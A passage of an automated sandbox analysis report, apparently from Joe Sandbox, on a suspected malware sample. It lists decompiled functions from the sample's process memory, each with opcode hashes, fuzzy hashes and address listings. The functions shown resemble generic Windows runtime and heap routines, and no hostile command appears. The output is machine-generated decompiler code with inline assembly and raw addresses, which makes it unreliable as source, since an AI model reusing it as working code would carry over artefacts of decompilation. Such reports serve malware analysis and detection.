                                        • Opcode ID: 03c794078997c7818913a959b3f50a48383dac9b617a0cc1bb518c6b88d5ad6f
                                        • Instruction ID: 10e3870074a3001ec9cb4d920ab8327c6d469d00953cbc3f04628dd0e1405942
                                        • Opcode Fuzzy Hash: 03c794078997c7818913a959b3f50a48383dac9b617a0cc1bb518c6b88d5ad6f
                                        • Instruction Fuzzy Hash: 90317A72A093018FE324DF1DC800B2AFBE5FB88B00F05496DE9999B355E7B0E944CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E8EC7 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E016E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x179d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E016D4E70(0x17986e4, 0x16e9490, 0, 0);
					if( *0x17953e8 > 5 && E016E8F33(0x17953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x17953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x17953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x168bc46;
						_t48 = E01727B9C(0x17953e8, 0x168bc46, _t67, 0x17953e8, _t70,  &_v140);
					}
				}
				return E016EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                        0x016e8ec7
                                        0x016e8ed9
                                        0x016e8edc
                                        0x016e8ee6
                                        0x016e8ee9
                                        0x016e8eee
                                        0x016e8efc
                                        0x016e8f08
                                        0x01721349
                                        0x01721353
                                        0x0172135d
                                        0x01721366
                                        0x0172136f
                                        0x01721375
                                        0x0172137c
                                        0x01721385
                                        0x01721390
                                        0x01721391
                                        0x0172139c
                                        0x0172139d
                                        0x017213a6
                                        0x017213ac
                                        0x017213b2
                                        0x017213b5
                                        0x017213bc
                                        0x017213bf
                                        0x017213c2
                                        0x017213c5
                                        0x017213c8
                                        0x017213cb
                                        0x017213ce
                                        0x017213d1
                                        0x017213d4
                                        0x017213d7
                                        0x017213da
                                        0x017213dd
                                        0x017213e0
                                        0x017213e3
                                        0x017213e6
                                        0x017213e9
                                        0x017213f6
                                        0x01721400
                                        0x01721400
                                        0x016e8f08
                                        0x016e8f32

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c775b86c277812767cc93c0b2d3666018dce0c3c76100754d8490d99238002ff
                                        • Instruction ID: 55bdcdc2fb565a89c5ec5237ec568284e6483982b706d7d1d47e9e12970a58ab
                                        • Opcode Fuzzy Hash: c775b86c277812767cc93c0b2d3666018dce0c3c76100754d8490d99238002ff
                                        • Instruction Fuzzy Hash: F541A1B1D01228DFDB20CFAAD981AADFBF9FB48710F5042AEE509A7200D7745A45CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DE730 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 74%
                                        			E016DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E016E9670() < 0) {
					L016FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1797b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L016C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M016DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                        0x016de730
                                        0x016de736
                                        0x016de738
                                        0x016de73d
                                        0x016de73e
                                        0x016de740
                                        0x016de749
                                        0x016de765
                                        0x016de76a
                                        0x016de76b
                                        0x016de76c
                                        0x016de76d
                                        0x016de76e
                                        0x016de76f
                                        0x016de775
                                        0x016de777
                                        0x016de77e
                                        0x0171b675
                                        0x016de784
                                        0x016de784
                                        0x016de789
                                        0x016de7a8
                                        0x016de7ac
                                        0x016de807
                                        0x016de7ae
                                        0x016de7ae
                                        0x016de7b1
                                        0x016de7b4
                                        0x016de7b9
                                        0x016de7c0
                                        0x016de7c4
                                        0x016de7ca
                                        0x016de7cc
                                        0x00000000
                                        0x016de7d3
                                        0x016de7d6
                                        0x00000000
                                        0x00000000
                                        0x016de7ff
                                        0x016de802
                                        0x00000000
                                        0x00000000
                                        0x016de7f9
                                        0x016de7fc
                                        0x00000000
                                        0x00000000
                                        0x016de7f3
                                        0x016de7f6
                                        0x00000000
                                        0x00000000
                                        0x016de7ed
                                        0x016de7f0
                                        0x00000000
                                        0x00000000
                                        0x016de7e7
                                        0x016de7ea
                                        0x00000000
                                        0x00000000
                                        0x0171b685
                                        0x0171b688
                                        0x00000000
                                        0x00000000
                                        0x0171b682
                                        0x00000000
                                        0x00000000
                                        0x016de7cc
                                        0x016de7d9
                                        0x016de7dc
                                        0x016de7de
                                        0x016de7de
                                        0x016de7ac
                                        0x016de7e4
                                        0x016de74b
                                        0x016de751
                                        0x016de759
                                        0x016de761
                                        0x016de761

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72161595ffddb1a1d4fb8fbe5a039e5f86b9a9eca6ed4d532b4edade55b5f58c
                                        • Instruction ID: 789ef854fb73d5f0dcecea19f12e82ded91f0ab60224c55a4e0633a0fa932194
                                        • Opcode Fuzzy Hash: 72161595ffddb1a1d4fb8fbe5a039e5f86b9a9eca6ed4d532b4edade55b5f58c
                                        • Instruction Fuzzy Hash: 8F316D75A14249EFD744CF58D841F9ABBE4FB19314F15825AFA08CB341D632ED90CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DBC2C Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 67%
                                        			E016DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1796100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E016C2280(0xd, 0x75ef1a0);
				_t41 =  *0x17960f8; // 0x0
				if(_t41 != 0) {
					 *0x17960f8 =  *_t41;
					 *0x17960fc =  *0x17960fc + 0xffff;
				}
				E016BFFB0(_t41, 0x800, 0x75ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x17960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L016C4620(0x1796100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1796100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                        0x016dbc36
                                        0x016dbc42
                                        0x016dbc45
                                        0x016dbc4a
                                        0x016dbd35
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016dbc50
                                        0x016dbc50
                                        0x016dbc58
                                        0x016dbc5a
                                        0x016dbc60
                                        0x00000000
                                        0x00000000
                                        0x0171a4f2
                                        0x0171a4f6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0171a4fc
                                        0x016dbc79
                                        0x016dbc7e
                                        0x016dbc86
                                        0x016dbd16
                                        0x016dbd20
                                        0x016dbd20
                                        0x016dbc8d
                                        0x016dbc94
                                        0x016dbcbd
                                        0x016dbcca
                                        0x016dbccb
                                        0x016dbccc
                                        0x016dbccd
                                        0x016dbcce
                                        0x016dbcd4
                                        0x016dbcea
                                        0x016dbcee
                                        0x016dbcf2
                                        0x016dbd00
                                        0x016dbd04
                                        0x00000000
                                        0x016dbc96
                                        0x016dbcab
                                        0x016dbcaf
                                        0x016dbd2c
                                        0x016dbd2c
                                        0x016dbd09
                                        0x00000000
                                        0x016dbd09
                                        0x016dbcb1
                                        0x016dbcb5
                                        0x016dbcbb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016dbcbb

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 910e434d92e9ed02215d360690dcebffccb60c2f1b2903c94d177cc3106ea2d1
                                        • Instruction ID: 6e98a54d152aba8005f8d7e94ee5fccff94d64f017fc8ebf31f270f258db6987
                                        • Opcode Fuzzy Hash: 910e434d92e9ed02215d360690dcebffccb60c2f1b2903c94d177cc3106ea2d1
                                        • Instruction Fuzzy Hash: 7D310172A006169BCB21EF5CD8C1BA673B4FB19320F164179ED44DB30AEB34D94A8B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016A9100 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 76%
                                        			E016A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x177f6e8);
				E016FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E017788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E016FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x17986c0; // 0x12407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x17986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E016C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E017788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E016EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x179b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x17984c0;
										if(_t69 >=  *0x17984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01779063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E016A922A(_t82);
							_t53 = E016C7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01778B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x17986c0; // 0x12407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x17986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x17986bc;
										_t72 = 0x17986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E016A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x17986c4;
									_t72 = 0x17986c0;
									L18:
									E016D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                        0x016a9100
                                        0x016a9100
                                        0x016a9100
                                        0x016a9100
                                        0x016a9102
                                        0x016a9107
                                        0x016a910c
                                        0x016a9110
                                        0x016a9115
                                        0x016a9136
                                        0x016a9143
                                        0x017037e4
                                        0x017037e4
                                        0x016a9149
                                        0x016a914e
                                        0x016a914e
                                        0x016a9117
                                        0x016a911d
                                        0x00000000
                                        0x00000000
                                        0x016a911f
                                        0x016a9125
                                        0x00000000
                                        0x016a9151
                                        0x016a9158
                                        0x016a915d
                                        0x016a9161
                                        0x016a9168
                                        0x01703715
                                        0x00000000
                                        0x016a916e
                                        0x016a916e
                                        0x016a9175
                                        0x016a9177
                                        0x016a917e
                                        0x016a917f
                                        0x016a9182
                                        0x016a9182
                                        0x016a9187
                                        0x016a9187
                                        0x016a918a
                                        0x016a918d
                                        0x016a918f
                                        0x016a9192
                                        0x016a9195
                                        0x016a9198
                                        0x016a9198
                                        0x016a9198
                                        0x016a919a
                                        0x00000000
                                        0x00000000
                                        0x0170371f
                                        0x01703721
                                        0x01703727
                                        0x0170372f
                                        0x01703733
                                        0x01703735
                                        0x01703738
                                        0x0170373b
                                        0x0170373d
                                        0x01703740
                                        0x00000000
                                        0x00000000
                                        0x01703746
                                        0x01703749
                                        0x00000000
                                        0x00000000
                                        0x0170374f
                                        0x01703751
                                        0x00000000
                                        0x00000000
                                        0x01703757
                                        0x01703759
                                        0x0170375c
                                        0x0170375c
                                        0x0170375e
                                        0x0170375e
                                        0x01703761
                                        0x01703764
                                        0x00000000
                                        0x00000000
                                        0x01703766
                                        0x01703768
                                        0x017037a3
                                        0x017037a3
                                        0x017037a5
                                        0x017037a7
                                        0x017037ad
                                        0x017037b0
                                        0x017037b2
                                        0x017037bc
                                        0x017037c2
                                        0x017037c2
                                        0x017037b2
                                        0x016a9187
                                        0x016a9187
                                        0x016a918a
                                        0x016a918d
                                        0x016a918f
                                        0x016a9192
                                        0x016a9195
                                        0x00000000
                                        0x016a9195
                                        0x00000000
                                        0x016a9187
                                        0x0170376a
                                        0x0170376a
                                        0x0170376c
                                        0x0170376c
                                        0x0170376f
                                        0x01703775
                                        0x00000000
                                        0x00000000
                                        0x01703777
                                        0x01703779
                                        0x00000000
                                        0x00000000
                                        0x01703782
                                        0x01703787
                                        0x01703789
                                        0x01703790
                                        0x01703790
                                        0x0170378b
                                        0x0170378b
                                        0x0170378b
                                        0x01703792
                                        0x01703795
                                        0x01703795
                                        0x01703798
                                        0x01703798
                                        0x0170379b
                                        0x0170379b
                                        0x016a91a3
                                        0x016a91a9
                                        0x016a91b0
                                        0x016a91b4
                                        0x016a91b4
                                        0x016a91bb
                                        0x016a91c0
                                        0x016a91c5
                                        0x016a91c7
                                        0x017037da
                                        0x016a91cd
                                        0x016a91cd
                                        0x016a91cd
                                        0x016a91d2
                                        0x016a91d5
                                        0x016a9239
                                        0x016a9239
                                        0x016a91d7
                                        0x016a91db
                                        0x016a91e1
                                        0x016a91e7
                                        0x016a91fd
                                        0x016a9203
                                        0x016a921e
                                        0x016a9223
                                        0x00000000
                                        0x016a9223
                                        0x016a9205
                                        0x016a9208
                                        0x016a920c
                                        0x016a9214
                                        0x016a9214
                                        0x016a91e9
                                        0x016a91e9
                                        0x016a91ee
                                        0x016a91f3
                                        0x016a91f3
                                        0x016a91f3
                                        0x016a91e7
                                        0x00000000
                                        0x016a91db
                                        0x016a9187
                                        0x016a9168

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19a84dd075c3022e3035c7e66029a8b971a5bce18d7a62d7f94cab00c7015d2f
                                        • Instruction ID: 60f794543763f671c92daf68b10a51ed0a0f7c191090a150fcbc8d45352c19d0
                                        • Opcode Fuzzy Hash: 19a84dd075c3022e3035c7e66029a8b971a5bce18d7a62d7f94cab00c7015d2f
                                        • Instruction Fuzzy Hash: E6317A71A04245DFDB26DB6CC888BADBBF1BB49318FA8815DC5046B342C334AD80CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D1DB5 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 60%
                                        			E016D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E016CF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L016C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E016CF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                        0x016d1dc2
                                        0x016d1dc5
                                        0x016d1dc7
                                        0x016d1dcc
                                        0x016d1dce
                                        0x016d1dd6
                                        0x016d1ddf
                                        0x016d1de0
                                        0x016d1de1
                                        0x016d1de5
                                        0x016d1de8
                                        0x016d1def
                                        0x016d1df0
                                        0x016d1df6
                                        0x016d1df7
                                        0x016d1dfe
                                        0x016d1e1a
                                        0x00000000
                                        0x00000000
                                        0x016d1e0b
                                        0x016d1e12
                                        0x016d1e12
                                        0x016d1e00
                                        0x016d1e00
                                        0x016d1e05
                                        0x016d1e1e
                                        0x016d1e23
                                        0x0171570f
                                        0x01715713
                                        0x00000000
                                        0x00000000
                                        0x01715719
                                        0x01715719
                                        0x016d1e2c
                                        0x016d1e2d
                                        0x016d1e2e
                                        0x016d1e2f
                                        0x016d1e31
                                        0x016d1e32
                                        0x016d1e35
                                        0x016d1e3d
                                        0x01715723
                                        0x0171573d
                                        0x0171573d
                                        0x00000000
                                        0x01715723
                                        0x016d1e49
                                        0x016d1e4e
                                        0x016d1e4e
                                        0x016d1e09
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                        • Instruction ID: 11b0b7572066b32704b00e93c6f673bed36a14cb5574b1bfd946722cbef24d01
                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                        • Instruction Fuzzy Hash: 2D215172A00119EFD725CF9ACC84EABBBBDEF86650F154059EA0597210DB74AE41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016C0050 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E016C0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x179d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E016D9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E016EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01778A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E016D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x179b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                        0x016c0055
                                        0x016c005d
                                        0x016c0062
                                        0x016c006c
                                        0x016c006f
                                        0x016c0074
                                        0x016c007a
                                        0x016c007a
                                        0x016c0080
                                        0x016c0080
                                        0x016c0087
                                        0x016c008d
                                        0x016c008f
                                        0x016c0093
                                        0x016c0095
